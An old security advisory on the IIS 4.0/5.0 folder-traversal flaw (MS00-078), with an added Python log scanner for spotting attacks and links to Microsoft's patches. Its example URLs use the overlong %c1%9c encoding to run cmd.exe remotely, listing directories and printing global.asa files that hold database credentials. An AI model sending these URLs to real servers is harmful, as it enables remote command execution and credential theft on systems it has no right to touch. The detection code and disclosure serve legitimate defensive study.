Remote control of IIS Windows 09/22/2001

Products Affected: Internet Information Services (IIS) 4.0 & 5.0
OS: Windows NT, Windows 2000

Description:
Run commands remotely on IIS.
This article describes the "Web Server Folder Traversal" security vulnerability in Internet Information Server (IIS).

Advisory:
By passing a single crafted URL to a vulnerable machine you can run any command directly on that machine. Remember this is for EDUCATIONAL USE ONLY and should only be run on your own machine.

For example:

First, you can list all the files in a directory with the following URL (replace localhost with the host name of the server):
http://localhost/scripts/..%c1%9c../winnt/system32/cmd.exe?/C+dir+C:

You can list any directory on the system by changing "C:" to another path, for example c:\inetpub.

Other executables can be run the same way, for example:
http://localhost/scripts/..%c1%9c../winnt/system32/route.exe?PRINT

This example prints a copy of the routing table directly to your browser. Any executable that writes to standard output can be run from this line, such as netstat, ipconfig, tftp, etc.

Now let's say you find something interesting on the machine's hard drive. For example, a crappy ASP programmer will use global.asa to hold all the database connection info. If you're curious enough and you're familiar with IIS, you know where to find it; I'm not going to hold your hand.

To view a file of interest you would simply use this URL:
http://localhost/scripts/..%c1%9c../winnt/system32/cmd.exe?/C+type+C:\inetpub\wwwroot\directory\global.asa

This will 'type' the file's contents to your browser; in other words, you can view all the source code instead of having the server execute it.
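An added example, not part of the original advisory, showing how a defender would spot these requests in IIS web logs. The `%c1%9c` sequence is an overlong UTF-8 encoding of a backslash, which the unpatched server decoded only after its path check had passed, so the script below decodes paths the same lenient way and flags both the overlong form and plain `..` escapes from the virtual root. The log lines and IP addresses are constructed; the field layout assumes the W3C extended format (date time c-ip cs-method cs-uri-stem cs-uri-query sc-status).

```python
from urllib.parse import unquote_to_bytes

# Constructed W3C-style IIS log lines (date time c-ip cs-method cs-uri-stem cs-uri-query sc-status).
SAMPLE_LOG = """\
2001-09-22 10:00:01 10.0.0.5 GET /default.asp - 200
2001-09-22 10:00:07 10.0.0.9 GET /scripts/..%c1%9c../winnt/system32/cmd.exe /C+dir+C: 200
2001-09-22 10:00:12 10.0.0.7 GET /scripts/..%5c../winnt/system32/cmd.exe /C+dir 404
2001-09-22 10:00:15 10.0.0.3 GET /images/logo.gif - 200
"""

def is_overlong(raw: bytes, i: int) -> bool:
    """True if raw[i:i+2] is an overlong 2-byte UTF-8 sequence (lead 0xC0/0xC1); strict decoders reject these."""
    return raw[i] in (0xC0, 0xC1) and i + 1 < len(raw) and 0x80 <= raw[i + 1] <= 0xBF

def decode_lenient(raw: bytes) -> str:
    """Decode like the unpatched server: accept an overlong pair as the ASCII char it stands for (%c1%9c -> '\\')."""
    out, i = [], 0
    while i < len(raw):
        if is_overlong(raw, i):
            out.append(chr(((raw[i] & 0x1F) << 6) | (raw[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(raw[i]) if raw[i] < 0x80 else "?")
            i += 1
    return "".join(out)

def escapes_root(path: str) -> bool:
    """True if '..' segments climb above the virtual root (either slash style)."""
    depth = 0
    for seg in path.replace("\\", "/").split("/"):
        depth += -1 if seg == ".." else (seg not in ("", "."))
        if depth < 0:
            return True
    return False

def flag_log(text: str) -> list[tuple[str, str]]:
    """Return (client IP, reason) for each request whose URI stem is a traversal attempt."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 7:
            continue
        raw = unquote_to_bytes(fields[4])  # cs-uri-stem, percent-decoded to raw bytes
        if any(is_overlong(raw, i) for i in range(len(raw))):
            hits.append((fields[2], "overlong UTF-8 in path"))
        elif escapes_root(decode_lenient(raw)):
            hits.append((fields[2], "directory traversal"))
    return hits
```

Run `flag_log` over your own exported IIS logs; a hit on `cmd.exe` under `/scripts` with a 200 status means the command actually executed.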

Fix:
Microsoft IIS 4.0:
http://www.microsoft.com/ntserver/nts/downloads/critical/q269862

Microsoft IIS 5.0:
http://www.microsoft.com/windows2000/downloads/critical/q269862

Microsoft Security Bulletin MS00-078:
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/Security/Bulletin/ms00-078.asp

Credits:
rOOtless@astalavista.com (Core Member)